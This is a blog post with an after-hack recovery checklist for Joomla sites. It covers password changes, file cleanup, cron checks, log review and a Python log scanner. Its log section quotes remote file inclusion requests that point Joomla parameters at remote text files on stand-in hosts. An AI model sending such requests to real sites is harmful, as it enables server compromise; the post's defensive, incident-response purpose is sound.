I've blogged about 'Joomla Security Tips'. You can think of this post as the continuation of that one. It is based on the question 'Your Joomla! site is hacked. Now what?' Feel free to add your own ideas or fix our mistakes.

Let's start.

  1. Change All Passwords: Change every password related to the site (Joomla admin panel, FTP, your hosting panel such as cPanel, database users, shell access).
  2. Delete All Files Under Root Directory and Related Database Records: I think the best way to make sure that every potential vulnerability is removed from your Joomla! site is to delete all files under public_html and the related database records. A script kiddie who only wants to deface your index page will mostly attack your index file, but professional attackers are usually very interested in your database records, such as passwords. If you do not want to apply this step, we suggest you visit this JED category. Back up your web site.
  3. List Recently Modified or Created Files: Before you make any change to your web site (such as deleting the files under public_html or restoring your backup), I think it's better to create a list of recently modified or created files. If you have SSH access, find . -type f -mtime -20 will list the files that were created or modified in the last 20 days (PHP scripts that do the same can be found by searching Google). When you have the list, check it to identify new files that don't belong to Joomla!
  4. Cron Jobs: Do not forget to check the scripts that are run by your cron jobs.
  5. Check Your Raw Logs: I also suggest you check your raw logs to work out how your web site was hacked. When you go through them, you may see lines like these:
    • 192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] "GET /index.php?live_site=test.org/1.txt?? HTTP/1.1" 200 10864 "-" "Firefox"
    • 192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.test.com/id1.txt? HTTP/1.1" 200 10864 "-" "Firefox"
    • 192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] "GET /components/com_XXX/file.php?live_site=test.org/1.txt?? HTTP/1.1" 200 10864 "-" "Firefox"
      • 192.168.0.1 is the attacker's IP address
      • 29/Oct/2008:06:07:30 is the date and time of the attack
      • /components/com_XXX/file.php is the file that was attacked. It belongs to the XXX component. Make sure that you are using the latest version of the XXX component
  6. Inform Your Hosting Company: When (or if) you have discovered how the attack happened, send an e-mail or open a ticket with your hosting company.
  7. Continue to Watch Your Web Site: The attackers may come back to your web site.
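The log check from step 5 can be automated. The following is an added example, not part of the original post: it scans access-log lines for query parameters whose value points at a remote resource, as in the three sample lines above. The function name, the regular expressions and the two benign log lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

# Heuristic (assumption): a parameter value that starts like a remote resource,
# either an explicit scheme (http://...) or a bare host/path (test.org/1.txt).
# Values such as "index.php/foo" also match, so review hits by hand.
REMOTE_RE = re.compile(r'^(?:(?:https?|ftp)://|[a-z0-9-]+(?:\.[a-z0-9-]+)+/)', re.I)

def find_remote_include_attempts(lines):
    """Return one record per query parameter whose value points off-site."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        ip, when, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            name, value = unquote(name), unquote(value)  # undo %-encoding
            if REMOTE_RE.match(value):
                # Status 200 only means the page was served, not that the
                # inclusion worked; treat every hit as a lead to follow up.
                hits.append({"ip": ip, "time": when, "path": path,
                             "param": name, "status": int(status)})
    return hits

# The first and last lines are constructed benign traffic; the middle three
# are the example lines from the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Oct/2008:06:05:12 -0500] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 5120 "-" "Firefox"',
    '192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] "GET /index.php?live_site=test.org/1.txt?? HTTP/1.1" 200 10864 "-" "Firefox"',
    '192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.test.com/id1.txt? HTTP/1.1" 200 10864 "-" "Firefox"',
    '192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] "GET /components/com_XXX/file.php?live_site=test.org/1.txt?? HTTP/1.1" 200 10864 "-" "Firefox"',
    '203.0.113.7 - - [29/Oct/2008:06:09:41 -0500] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Firefox"',
]

if __name__ == "__main__":
    for h in find_remote_include_attempts(SAMPLE_LOG):
        print(h["time"], h["ip"], h["path"], "param:", h["param"], "status:", h["status"])
```

Each hit gives the attacked file (path), the overridden parameter and the source IP, which is the information steps 5 and 6 ask you to collect.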
What do you think of this after-hack checklist?